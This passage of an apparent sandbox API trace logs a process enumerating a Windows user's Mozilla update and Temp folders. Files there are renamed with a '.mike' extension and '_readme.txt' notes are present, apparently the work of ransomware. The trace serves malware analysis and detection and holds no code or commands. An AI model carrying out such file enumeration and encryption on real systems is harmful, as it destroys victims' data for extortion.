ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1ffa2b00, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1ffa2b00, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x690, dwReserved0=0x0, dwReserved1=0x0, cFileName="active-update.xml.mike", cAlternateFileName="ACTIVE~1.MIK")) returned 1 [0145.478] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb74b7b30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb74b7b30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb74b7b30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="updates", cAlternateFileName="")) returned 1 [0145.478] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ffc8c60, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1ffc8c60, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1ffc8c60, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x260, dwReserved0=0x0, dwReserved1=0x0, cFileName="updates.xml.mike", cAlternateFileName="UPDATE~1.MIK")) returned 1 [0145.479] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ffc8c60, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1ffc8c60, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1ffeedc0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0145.479] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ffc8c60, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1ffc8c60, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1ffeedc0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0145.479] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0145.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0145.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0145.480] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0145.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0145.481] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\*", lpFindFileData=0x2aedf4 | out: lpFindFileData=0x2aedf4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb74b7b30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb74b7b30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb74b7b30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0145.482] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb74b7b30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb74b7b30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb74b7b30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0145.482] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb74b7b30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x80a2b6d0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80a2b6d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0", cAlternateFileName="")) returned 1 [0145.482] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb74b7b30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x80a2b6d0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80a2b6d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0", cAlternateFileName="")) returned 0 [0145.483] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0145.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0145.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0145.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0145.484] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\*", lpFindFileData=0x2aedf4 | out: lpFindFileData=0x2aedf4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb74b7b30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb74b7b30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb74b7b30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0145.484] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb74b7b30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb74b7b30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb74b7b30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0145.484] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb74b7b30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x80a2b6d0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80a2b6d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0", cAlternateFileName="")) returned 1 [0145.485] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0145.485] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0145.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0145.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0145.485] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0145.486] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0145.486] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\", lpFilePart=0x0) returned 0x57 [0145.486] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\*", lpFindFileData=0x2aedac | out: lpFindFileData=0x2aedac*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb74b7b30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x80a2b6d0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80a2b6d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0145.487] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb74b7b30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x80a2b6d0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80a2b6d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0145.487] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb7d7ec50, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7d7ec50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x818016b0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x927c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="update.mar", cAlternateFileName="")) returned 1 [0145.488] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80993150, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x80993150, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80993150, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xc, dwReserved0=0x0, dwReserved1=0x0, cFileName="update.status", cAlternateFileName="UPDATE~1.STA")) returned 1 [0145.488] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0145.488] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0145.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0145.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0145.489] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status", nBufferLength=0x105, lpBuffer=0x2aeb44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status", lpFilePart=0x0) returned 0x64 [0145.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0145.489] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\*", lpFindFileData=0x2aedac | out: lpFindFileData=0x2aedac*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb74b7b30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x80a2b6d0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80a2b6d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0145.490] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb74b7b30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x80a2b6d0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80a2b6d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0145.490] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb7d7ec50, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7d7ec50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x818016b0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x927c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="update.mar", cAlternateFileName="")) returned 1 [0145.491] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80993150, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x80993150, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80993150, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xc, dwReserved0=0x0, dwReserved1=0x0, cFileName="update.status", cAlternateFileName="UPDATE~1.STA")) returned 1 [0145.491] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80993150, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x80993150, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80993150, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xc, dwReserved0=0x0, dwReserved1=0x0, cFileName="update.status", cAlternateFileName="UPDATE~1.STA")) returned 0 [0145.491] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0145.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af044) returned 1 [0145.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0145.492] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0145.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0145.492] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaf22bc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xdaf22bc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0145.493] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaf22bc0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xdaf22bc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0145.493] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x88447930, ftCreationTime.dwHighDateTime=0x1d4d281, ftLastAccessTime.dwLowDateTime=0x4f630f10, ftLastAccessTime.dwHighDateTime=0x1d4ceed, ftLastWriteTime.dwLowDateTime=0x4f630f10, ftLastWriteTime.dwHighDateTime=0x1d4ceed, nFileSizeHigh=0x0, nFileSizeLow=0x170ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="0R9qLU2Wpa.wav", cAlternateFileName="0R9QLU~1.WAV")) returned 1 [0145.494] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf95d2860, ftCreationTime.dwHighDateTime=0x1d4c5ed, ftLastAccessTime.dwLowDateTime=0xf4980cd0, ftLastAccessTime.dwHighDateTime=0x1d4d3af, ftLastWriteTime.dwLowDateTime=0xf4980cd0, ftLastWriteTime.dwHighDateTime=0x1d4d3af, nFileSizeHigh=0x0, nFileSizeLow=0x655a, dwReserved0=0x0, dwReserved1=0x0, cFileName="5vj8K5tO.swf", cAlternateFileName="")) returned 1 [0145.494] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x433160c0, ftCreationTime.dwHighDateTime=0x1d4cb87, ftLastAccessTime.dwLowDateTime=0x4c818550, ftLastAccessTime.dwHighDateTime=0x1d4d0e2, ftLastWriteTime.dwLowDateTime=0x4c818550, ftLastWriteTime.dwHighDateTime=0x1d4d0e2, nFileSizeHigh=0x0, nFileSizeLow=0xfcac, dwReserved0=0x0, dwReserved1=0x0, cFileName="8LHQLxa5GYmKMLFZJxu.gif", cAlternateFileName="8LHQLX~1.GIF")) returned 1 [0145.494] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5436aaa0, ftCreationTime.dwHighDateTime=0x1d4d173, ftLastAccessTime.dwLowDateTime=0xe0c54240, ftLastAccessTime.dwHighDateTime=0x1d4c969, ftLastWriteTime.dwLowDateTime=0xe0c54240, ftLastWriteTime.dwHighDateTime=0x1d4c969, nFileSizeHigh=0x0, nFileSizeLow=0x51c9, dwReserved0=0x0, dwReserved1=0x0, cFileName="8pc-KMxnIuh.mp3", cAlternateFileName="8PC-KM~1.MP3")) returned 1 [0145.494] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5cc52ed0, ftCreationTime.dwHighDateTime=0x1d4d50b, ftLastAccessTime.dwLowDateTime=0xa7573c60, ftLastAccessTime.dwHighDateTime=0x1d4c8f2, ftLastWriteTime.dwLowDateTime=0xa7573c60, ftLastWriteTime.dwHighDateTime=0x1d4c8f2, nFileSizeHigh=0x0, nFileSizeLow=0xfd37, dwReserved0=0x0, dwReserved1=0x0, cFileName="a3Hc.mp3", cAlternateFileName="")) returned 1 [0145.495] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8426eba0, ftCreationTime.dwHighDateTime=0x1d4d5ae, ftLastAccessTime.dwLowDateTime=0x8426eba0, ftLastAccessTime.dwHighDateTime=0x1d4d5ae, ftLastWriteTime.dwLowDateTime=0x842e0fc0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x2fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeARM.log", cAlternateFileName="")) returned 1 [0145.495] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe6456270, ftCreationTime.dwHighDateTime=0x1d4cae7, ftLastAccessTime.dwLowDateTime=0xbd85bb90, ftLastAccessTime.dwHighDateTime=0x1d4cb74, ftLastWriteTime.dwLowDateTime=0xbd85bb90, ftLastWriteTime.dwHighDateTime=0x1d4cb74, nFileSizeHigh=0x0, nFileSizeLow=0x14044, dwReserved0=0x0, dwReserved1=0x0, cFileName="b3aiZzN.m4a", cAlternateFileName="")) returned 1 [0145.495] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97d7f40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0145.496] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe6dce4e0, ftCreationTime.dwHighDateTime=0x1d4d2a5, ftLastAccessTime.dwLowDateTime=0x966b7ab0, ftLastAccessTime.dwHighDateTime=0x1d4d42d, ftLastWriteTime.dwLowDateTime=0x966b7ab0, ftLastWriteTime.dwHighDateTime=0x1d4d42d, nFileSizeHigh=0x0, nFileSizeLow=0x2808, dwReserved0=0x0, dwReserved1=0x0, cFileName="edJWDvM7 Z3z2t.mp3", cAlternateFileName="EDJWDV~1.MP3")) returned 1 [0145.496] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a91850, ftCreationTime.dwHighDateTime=0x1d4c9ac, ftLastAccessTime.dwLowDateTime=0xa5a1eb90, ftLastAccessTime.dwHighDateTime=0x1d4cc71, ftLastWriteTime.dwLowDateTime=0xa5a1eb90, ftLastWriteTime.dwHighDateTime=0x1d4cc71, nFileSizeHigh=0x0, nFileSizeLow=0x7414, dwReserved0=0x0, dwReserved1=0x0, cFileName="eRJpK.mkv", cAlternateFileName="")) returned 1 [0145.496] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcf01b4f0, ftCreationTime.dwHighDateTime=0x1d4cbe2, ftLastAccessTime.dwLowDateTime=0x1d4c5960, ftLastAccessTime.dwHighDateTime=0x1d4d270, ftLastWriteTime.dwLowDateTime=0x1d4c5960, ftLastWriteTime.dwHighDateTime=0x1d4d270, nFileSizeHigh=0x0, nFileSizeLow=0x722d, dwReserved0=0x0, dwReserved1=0x0, cFileName="fgEYPIHM1Dml4.wav", cAlternateFileName="FGEYPI~1.WAV")) returned 1 [0145.497] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x33d9ad10, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x33d9ad10, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FXSAPIDebugLogFile.txt", cAlternateFileName="FXSAPI~1.TXT")) returned 1 [0145.497] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97fe0a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97fe0a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97fe0a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0145.497] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd20c37d0, ftCreationTime.dwHighDateTime=0x1d4ce3d, ftLastAccessTime.dwLowDateTime=0xceddea70, ftLastAccessTime.dwHighDateTime=0x1d4cb4c, ftLastWriteTime.dwLowDateTime=0xceddea70, ftLastWriteTime.dwHighDateTime=0x1d4cb4c, nFileSizeHigh=0x0, nFileSizeLow=0x205d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MksLa0m41b7UvH.mp3", cAlternateFileName="MKSLA0~1.MP3")) returned 1 [0145.498] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xacb614e0, ftCreationTime.dwHighDateTime=0x1d4d2b3, ftLastAccessTime.dwLowDateTime=0xb2982a10, ftLastAccessTime.dwHighDateTime=0x1d4ce71, ftLastWriteTime.dwLowDateTime=0xb2982a10, ftLastWriteTime.dwHighDateTime=0x1d4ce71, nFileSizeHigh=0x0, nFileSizeLow=0x14f71, dwReserved0=0x0, dwReserved1=0x0, cFileName="mXervh37EMC5.wav", cAlternateFileName="MXERVH~1.WAV")) returned 1 [0145.498] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x97a93e30, ftCreationTime.dwHighDateTime=0x1d4c771, ftLastAccessTime.dwLowDateTime=0x36e35f00, ftLastAccessTime.dwHighDateTime=0x1d4ceff, ftLastWriteTime.dwLowDateTime=0x36e35f00, ftLastWriteTime.dwHighDateTime=0x1d4ceff, nFileSizeHigh=0x0, nFileSizeLow=0xdb85, dwReserved0=0x0, dwReserved1=0x0, cFileName="NfDfawEIcHIAocL0w.bmp", cAlternateFileName="NFDFAW~1.BMP")) returned 1 [0145.498] FindNextFileW (in: hFindFile=0x4d1060, 